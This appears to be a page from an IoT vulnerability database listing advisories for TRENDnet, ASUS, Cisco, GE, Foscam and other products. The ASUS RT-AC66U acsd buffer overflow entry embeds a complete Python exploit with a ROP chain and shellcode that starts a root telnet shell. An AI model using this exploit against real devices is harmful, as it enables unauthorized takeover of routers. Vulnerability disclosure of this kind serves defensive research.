VARIoT IoT vulnerabilities database

Multiple cross-site request forgery (CSRF) vulnerabilities in TRENDnet TEW-812DRU router with firmware before 1.0.9.0 allow remote attackers to hijack the authentication of administrators for requests that (1) change admin credentials in a request to setSysAdm.cgi, (2) enable remote management or (3) enable port forwarding in an Apply action to uapply.cgi, or (4) have unspecified impact via a request to setNTP.cgi. NOTE: some of these details are obtained from third party information. The Trendnet TEW-812DRU is a dual-band Gigabit router device. Trendnet TEW-812DRU is prone to a cross-site request-forgery vulnerability. Attackers can exploit this issue to perform certain administrative actions and gain unauthorized access to the affected device. A cross-site request forgery vulnerability exists in the TRENDnet TEW-812DRU router with firmware version 1.0.8.0

TRENDnet TEW-812DRU router allows remote authenticated users to execute arbitrary commands via shell metacharacters in the (1) wan network prefix to internet/ipv6.asp; (2) remote port to adm/management.asp; (3) pptp username, (4) pptp password, (5) ip, (6) gateway, (7) l2tp username, or (8) l2tp password to internet/wan.asp; (9) NtpDstStart, (10) NtpDstEnd, or (11) NtpDstOffset to adm/time.asp; or (12) device url to adm/management.asp. NOTE: vectors 9, 10, and 11 can be exploited by unauthenticated remote attackers by leveraging CVE-2013-3098. The Trendnet TEW-812DRU is a dual-band Gigabit router device. Trendnet TEW-812DRU multiple scripts incorrectly filter user-submitted input, allowing remote attackers to exploit malicious exploits to submit malicious requests to inject OS commands and execute them with WEB privileges. Trendnet TEW-812DRU is prone to multiple command-injection vulnerabilities. Exploiting these issues could allow an attacker to execute arbitrary commands in the context of the affected devices. There is a security vulnerability in TRENDnet TEW-812DRU router, the vulnerability is caused by the program not sufficiently filtering the 'NtpDstEnd' and '\'\'NtpDstOffset' fields in the setNTP.cgi script

Buffer overflow in Broadcom ACSD allows remote attackers to execute arbitrary code via a long string to TCP port 5916. This component is used on routers of multiple vendors including ASUS RT-AC66U and TRENDnet TEW-812DRU. The ASUS RT-AC66U is a dual-band wireless router. ASUS RT-AC66U Broadcom acsd Wireless Channel Service (Wireless Channel Servic) has multiple buffer overflow vulnerabilities that allow remote attackers to exploit a vulnerability to submit a malicious request to stop the device from responding or possibly execute arbitrary code. ASUS RT-AC66U is prone to multiple buffer-overflow vulnerabilities. Failed exploit attempts will likely result in denial-of-service conditions. The former is produced by ASUS, and the latter is produced by TRENDnet in the United States. Broadcom ACSD is one of the wireless channel service components. A buffer overflow vulnerability exists in the Broadcom ACSD component used in the ASUS RT-AC66U and TRENDnet TEW-812DRU. #!/usr/bin/env python import signal, struct from time import sleep from socket import * from sys import exit, exc_info # # Title*******************ASUS RT-AC66U Remote Root Shell Exploit - acsd param command # Discovered and Reported*June 2013 # Discovered/Exploited By*Jacob Holcomb/Gimppy and Jacob Thompson # *Security Analsyts @ Independent Security Evaluators # Software Vendor*********http://asus.com # Exploit/Advisory********http://securityevaluators.com, http://infosec42.blogspot.com/ # Software****************acsd wireless service (Listens on TCP/5916) # Firmware Version********3.0.0.4.266 (Other versions were not tested and may be vulnerable) # CVE*********************ASUS RT-AC66U Multiple Buffer Overflows: CVE-2013-4659 # # Overview: # The ASUS RT-AC66U contains the Broadcom ACSD Wireless binary that is vulnerable to multiple # Buffer Overflow attacks. # # Multiple overflows exist in the following software: # # - Broadcom acsd - Wireless Channel Service (autochannel&param, autochannel&data, csscan&ifname commands) # def sigHandle(signum, frm): # Signal handler print "\n[!!!] Cleaning up the exploit... [!!!]\n" sleep(1) exit(0) def targServer(): while True: try: server = inet_aton(raw_input("\n[*] Please enter the IPv4 address of the ASUS RT-AC66U router:\n\n>")) server = inet_ntoa(server) break except: print "\n\n[!!!] Error: Please enter a valid IPv4 address. [!!!]\n\n" sleep(1) continue return server def main(): print ("""\n [*] Title: ASUS RT-AC66U Remote Root Shell Exploit - acsd param command [*] Discovered and Reported: June 2013 [*] Discovered/Exploited By: Jacob Holcomb/Gimppy and Jacob Thompson, Security Analysts @ ISE [*] Software Vendor: http://asus.com [*] Exploit/Advisory: http://securityevaluators.com, http://infosec42.blogspot.com/ [*] Software: acsd wireless service (Listens on TCP/5916) [*] Firmware Version: 3.0.0.4.266 (Other versions were not tested and may be vulnerable) [*] CVE: ASUS RT-AC66U Broadcom ACSD Buffer Overflow: CVE-2013-4659\n""") signal.signal(signal.SIGINT, sigHandle) #Setting signal handler for ctrl + c victim = targServer() port = int(5916) acsdCmd = "autochannel&param=" #Vulnerable command - JH # base address of .text section of libc.so.0 in acsd's address space libc_base = 0x2ab25000 # ROP gadget #1 # lui s0,0x2 # li a0,1 # move t9,s1 # jalr t9 # ori a1,s0,0x2 ra1 = struct.pack("<L", libc_base + 0x2d39c) # ROP gadget #2 # move t9,s3 # lw ra,44(sp) # lw s4,40(sp) # lw s3,36(sp) # lw s2,32(sp) # lw s1,28(sp) # lw s0,24(sp) # jr t9 s1 = struct.pack("<L", libc_base + 0x34358) # sleep() - used to force program context switch (cache flush) s3 = struct.pack("<L", libc_base + 0x2cb90) # ROP gadget #3 # addiu a1,sp,24 # lw gp,16(sp) # lw ra,32(sp) # jr ra # addiu sp,sp,40 ra2 = struct.pack("<L", libc_base + 0xa1b0) # ROP gadget #4 # move t9,a1 # addiu a0,a0,56 # jr t9 # move a1,a2 ra3 = struct.pack("<L", libc_base + 0x3167c) # jalr sp jalr_sp = "\x09\xf8\xa0\x03" JuNk = "\x42" * 510 safeNop = "2Aa3" #80 Bytes system() Shellcode by Jacob Holcomb of ISE #Calling system() and executing telnetd -l /bin/sh shellcode = "\x6c\x6e\x08\x3c\x74\x65\x08\x35\xec\xff\xa8" shellcode += "\xaf\x64\x20\x09\x3c\x65\x74\x29\x35\xf0\xff" shellcode += "\xa9\xaf\x20\x2f\x0a\x3c\x2d\x6c\x4a\x35\xf4" shellcode += "\xff\xaa\xaf\x6e\x2f\x0b\x3c\x62\x69\x6b\x35" shellcode += "\xf8\xff\xab\xaf\x73\x68\x0c\x24\xfc\xff\xac" shellcode += "\xaf\xec\xff\xa4\x23\xec\xff\xbd\x23\xb4\x2a" shellcode += "\x19\x3c\x50\xf0\x39\x37\x09\xf8\x20\x03\x32" shellcode += "\x41\x61\x33" sploit = acsdCmd + JuNk + s1 + JuNk[0:4] + s3 + ra1 + JuNk[0:48] sploit += ra2 + JuNk[0:24]+ jalr_sp + safeNop + ra3 + JuNk[0:4] sploit += safeNop + shellcode try: print "\n [*] Creating network socket." net_sock = socket(AF_INET, SOCK_STREAM) except: print "\n [!!!] There was an error creating the network socket. [!!!]\n\n%s\n" % exc_info() sleep(1) exit(0) try: print " [*] Connecting to ASUS RT-AC66U router @ %s on port TCP/%d." % (victim, port) net_sock.connect((victim, port)) except: print "\n [!!!] There was an error connecting to %s. [!!!]\n\n%s\n" % (victim, exc_info()) sleep(1) exit(0) try: print """ [*] Attempting to exploit the acsd param command. [*] Sending 1337 ro0t Sh3ll exploit to %s on TCP port %d. [*] Payload Length: %d bytes.""" % (victim, port, len(sploit)) net_sock.send(sploit) sleep(1) except: print "\n [!!!] There was an error sending the 1337 ro0t Sh3ll exploit to %s [!!!]\n\n%s\n" % (victim, exc_info()) sleep(1) exit(0) try: print """ [*] 1337 ro0t Sh3ll exploit was sent! Fingers crossed for code execution! [*] Closing network socket. Press ctrl + c repeatedly to force exploit cleanup.\n""" net_sock.close() except: print "\n [!!!] There was an error closing the network socket. [!!!]\n\n%s\n" % exc_info() sleep(1) exit(0) if __name__ == "__main__": main()

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Cogent Datahub. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web server component's handling of HTTP headers. By sending an overlarge HTTP header, an attacker can overflow a fixed size stack buffer. This vulnerability allows for an attacker to execute arbitrary code in the context of the Datahub process. Cogent Real-Time Systems DataHub is a set of real-time data system integration suite based on B / S architecture by Cogent Real-Time Systems of Canada. The kit includes tools such as DataHub WebView and DataHub QuickTrend. Cogent Real-Time Systems DataHub 7.3.0 vulnerabilities exist, other versions may also be affected. Failed exploit attempts will likely result in denial-of-service conditions

Multiple buffer overflows in CimWebServer.exe in the WebView component in GE Intelligent Platforms Proficy HMI/SCADA - CIMPLICITY before 8.0 SIM 27, 8.1 before SIM 25, and 8.2 before SIM 19, and Proficy Process Systems with CIMPLICITY, allow remote attackers to execute arbitrary code via crafted data in packets to TCP port 10212, aka ZDI-CAN-1621 and ZDI-CAN-1624. GE Intelligent Platforms Proficy HMI/SCADA - CIMPLICITY and Proficy Process Systems with CIMPLICITY of WebView Component CimWebServer.exe Contains a buffer overflow vulnerability. Zero Day Initiative The vulnerability ZDI-CAN-1621 and ZDI-CAN-1624 It was announced as.By a third party TCP port 10212 Arbitrary code may be executed via crafted data in the packet to the. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of GE Proficy CIMPLICITY. Authentication is not required to exploit this vulnerability. The specific flaw exists within the CimWebServer component. This component performs insufficient bounds checking on user-supplied data passed in the szPassword field which results in stack corruption. An attacker can leverage this situation to execute code under the context of the process. GE Proficy CIMPLICITY is a monitoring software developed by GE and one of the industry's leading HMI/SCADA software

TP-Link TL-WDR4300 version 3.13.31 has multiple CSRF vulnerabilities. TP-Link TL-WDR4300 Contains a cross-site request forgery vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The TP-Link TL-WDR4300 is a wireless router from China's TP-Link. A cross-site request forgery vulnerability exists in version 3.13.31 of TP-Link TL-WDR4300. The vulnerability stems from the fact that the WEB application does not fully verify whether the request is from a trusted user. The vulnerability can be exploited by an attacker to send an unexpected response to the server through the affected client. Request. Exploiting these issues may allow a remote attacker to perform certain unauthorized actions and compromise the affected device

Multiple unspecified vulnerabilities in Hitachi JP1/IT Desktop Management - Manager 09-50 through 09-50-03, 09-51 through 09-51-05, 10-00 through 10-00-02, and 10-01 through 10-01-02; Hitachi Job Management Partner 1/IT Desktop Management - Manager 09-50 through 09-50-03 and 10-01; and Hitachi IT Operations Director 02-50 through 02-50-07, 03-00 through 03-00-12, and 04-00 through 04-00-01 allow remote authenticated users to gain privileges via unknown vectors. Taizo Tsukamoto of GLOBAL SECURITY EXPERTS inc. reported this vulnerability to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.Users without administrative privileges may obtain administrative privileges. Multiple Hitachi products have security holes that allow local attackers to use the holes to elevate privileges. No detailed vulnerability details are provided at this time. A local attacker may leverage these issues to escalate privileges. This may lead to other attacks

The Broadkam PJ871 is a DSL router device. The Broadkam PJ871 DSL Router does not properly validate password replacement requests, allowing remote attackers to exploit vulnerabilities to submit special requests, change any user password, and grant unauthorized access to the appliance. Broadkam PJ871 is prone to an authentication-bypass vulnerability. An attacker may exploit this issue to bypass certain security restrictions and perform unauthorized actions. http://drupal.org/node/207891

The firewall subsystem in Cisco Identity Services Engine has an incorrect rule for open ports, which allows remote attackers to cause a denial of service (CPU consumption or process crash) via a flood of malformed IP packets, aka Bug ID CSCug94572. Cisco Identity Services Engine Software is prone to a remote denial-of-service vulnerability. Attackers can exploit this issue to cause the device to consume excessive CPU resources, resulting in denial-of-service conditions. This issue is being tracked by Cisco Bug ID CSCug94572. The platform monitors the network by collecting real-time information on the network, users and devices, and formulating and implementing corresponding policies. A security vulnerability exists in the firewall subsystem in Cisco ISE due to a program that opens ports for the wrong user role

Cross-site scripting (XSS) vulnerability in the WebVPN portal login page on Cisco Adaptive Security Appliances (ASA) devices allows remote attackers to inject arbitrary web script or HTML via a crafted URL, aka Bug ID CSCug83080. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue is being tracked by Cisco Bug ID CSCug83080

Multiple directory traversal vulnerabilities in Cisco Video Surveillance Manager (VSM) before 7.0.0 allow remote attackers to read system files via a crafted URL, related to the Cisco_VSBWT (aka Broadware sample code) package, aka Bug ID CSCsv37163. Vendors have confirmed this vulnerability Bug ID CSCsv37163 It is released as.Skillfully crafted by a third party URL System files may be read via. Exploiting this issue can allow an attacker to gain access to arbitrary files. Information harvested may aid in launching further attacks. This issue is being tracked by Cisco Bug ID CSCsv37163. Versions prior to Cisco Video Surveillance Manager 7.0.0 are vulnerable. It provides a browser-based user interface for collecting, managing, recording, archiving and categorizing video from multiple third-party video encoders and IP cameras. These vulnerabilities are caused by the program's failure to sanitize user-submitted input

Cisco Video Surveillance Manager (VSM) before 7.0.0 allows remote attackers to obtain sensitive configuration, archive, and log information via unspecified vectors, related to the Cisco_VSBWT (aka Broadware sample code) package, aka Bug ID CSCsv37288. Vendors report this vulnerability Bug ID CSCsv37288 Published as.Important settings, archives, and log information can be obtained by third parties. Cisco Video Surveillance Manager is prone to a remote authentication-bypass vulnerability. An attacker can exploit this issue to bypass the authentication mechanism and gain administrative controls of the vulnerable device. This may lead to further attacks. This issue is tracked by Cisco Bug ID CSCsv37288. Versions prior to Cisco Video Surveillance Manager 7.0.0 are vulnerable. It provides a browser-based user interface for collecting, managing, recording, archiving and categorizing video from multiple third-party video encoders and IP cameras. The vulnerability is caused by the fact that the program does not require authentication

Cisco Video Surveillance Manager (VSM) before 7.0.0 does not require authentication for access to VSMC monitoring pages, which allows remote attackers to obtain sensitive configuration, archive, and log information via unspecified vectors, related to the Cisco_VSBWT (aka Broadware sample code) package, aka Bug ID CSCsv40169. Vendors have confirmed this vulnerability Bug ID CSCsv40169 It is released as.A third party may obtain important configuration, archive, and log information. Cisco Video Surveillance Manager is prone to a remote authentication-bypass vulnerability. An attacker can exploit this issue to bypass the authentication mechanism and gain administrative controls of the vulnerable device. This may lead to further attacks. This issue is tracked by Cisco Bug ID CSCsv40169. Versions prior to Cisco Video Surveillance Manager 7.0.0 are vulnerable. It provides a browser-based user interface for collecting, managing, recording, archiving and categorizing video from multiple third-party video encoders and IP cameras. The vulnerability comes from the fact that the program accessing the VSMC monitoring page does not require identity authentication

The web framework in the server in Cisco Unified MeetingPlace Web Conferencing allows remote attackers to bypass intended access restrictions and read unspecified web pages via crafted parameters, aka Bug ID CSCuh86385. Vendors have confirmed this vulnerability Bug ID CSCuh86385 It is released as.Access restrictions can be avoided and unspecified by a third party through crafted parameters. Web The page may be vulnerable to read. Exploiting this issue could allow an attacker to bypass certain security restrictions and obtain unauthorized access to sensitive information on the affected device. This may aid in further attacks. This issue is being tracked by Cisco Bug ID CSCuh86385

An Access vulnerability exists in FOSCAM IP Camera FI8620 due to insufficient access restrictions in the /tmpfs/ and /log/ directories, which could let a malicious user obtain sensitive information. FOSCAM IP Camera FI8620 Contains an incorrect authentication vulnerability.Information may be obtained. FOSCAM IP-Cameras is a webcam device. FOSCAM IP-Cameras are prone to multiple unauthorized-access vulnerabilities. Attackers can exploit these issues to gain unauthorized access and obtain potentially sensitive information. This may aid in further attacks. FOSCAM FI8620 is vulnerable; other versions may also be affected

Multiple cross-site scripting (XSS) vulnerabilities in the administrative web interface in Cisco Unified Operations Manager allow remote attackers to inject arbitrary web script or HTML, and obtain improperly secured cookies, via unspecified vectors, aka Bug ID CSCud80186. Vendors have confirmed this vulnerability Bug ID CSCud80186 It is released as.By any third party Web Script or HTML Inserted and fraudulently protected C ookie May get you. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue is being tracked by Cisco Bug ID CSCud80186. It provides a real-time service status view of the entire Cisco Unified Communications system, showing the current operational status of each component

Cisco WebEx is a web conferencing solution. The Cisco WebEx One-Click Client handles password encryption with a security vulnerability. If a local attacker can obtain a user account, the file containing the encrypted password can be obtained and the password decrypted.

Cross-site scripting (XSS) vulnerability in the help page in Juniper Secure Access (SA) with IVE OS before 7.1r13, 7.2.x before 7.2r7, and 7.3.x before 7.3r2 allows remote attackers to inject arbitrary web script or HTML via the WWHSearchWordsText parameter. Junos Pulse Secure Access Service (SSL VPN) is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. Attacker-supplied HTML and script code could be executed in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks may also be possible. The client supports remote and mobile users to access enterprise resources with various web devices. The vulnerability exists in the following product versions: versions prior to 7.1r13, versions prior to 7.2r7, versions prior to 7.3r2. ------------------------------------------------------------------------------- | Juniper Secure Access XSS Vulnerability| -------------------------------------------------------------------------------- Summary =============== Juniper Secure Access software has reflected XSS vulnerability CVE number: CVE-2012-5460 PSN-2013-03-874 Impact: Low Vendor homepage: http://www.juniper.net/alerts/viewalert.jsp?actionBtn=Search&txtAlertNumber=PSN-2013-03-874&viewMode=view Vendor notified: 06/06/2012 Vendor fixed: 12/12/2012 Affected Products ================= Juniper SA (IVE OS) to versions prior to 7.1r13, 7.2r7, 7.3r2 . Details ================== In order to exploit this vulnerability , the client should authenticate to SSLVPN service.The vulnerable parameter exists on help page of IVE user web interface. Effected parameter: WWHSearchWordsText Impact ================== Execution of arbitrary script code in a user's browser during an authenticated session. Solution ================== Upgrade to 7.1r13, 7.2r7, 7.3r2, or higher. Twitter @pazwant

Cross-site scripting (XSS) vulnerability in Cisco Unified Operations Manager allows remote attackers to inject arbitrary web script or HTML via a crafted URL in an unspecified HTTP header field, aka Bug ID CSCud80182. Cisco Unified Operations Manager Contains a cross-site scripting vulnerability. By inserting arbitrary headers into an HTTP response, attackers may be able to launch various attacks, including cross-site request forgery, cross-site scripting, and HTTP-request smuggling. This issue is being tracked by Cisco Bug ID CSCud80182. It provides a real-time service status view of the entire Cisco Unified Communications system, showing the current operational status of each component

Cisco Aironet 3600 access points allow remote attackers to cause a denial of service (memory corruption and device crash) by disrupting Cisco Wireless LAN Controller communication and consequently forcing many transitions from FlexConnect mode to Standalone mode, aka Bug ID CSCuh71210. The Cisco Aironet 3600 access points is a Cisco wireless access point product. Successfully exploiting this issue allows remote attackers to cause denial-of-service conditions. This issue is being tracked by Cisco Bug ID CSCuh71210. The function of this product is to connect wired network and wireless clients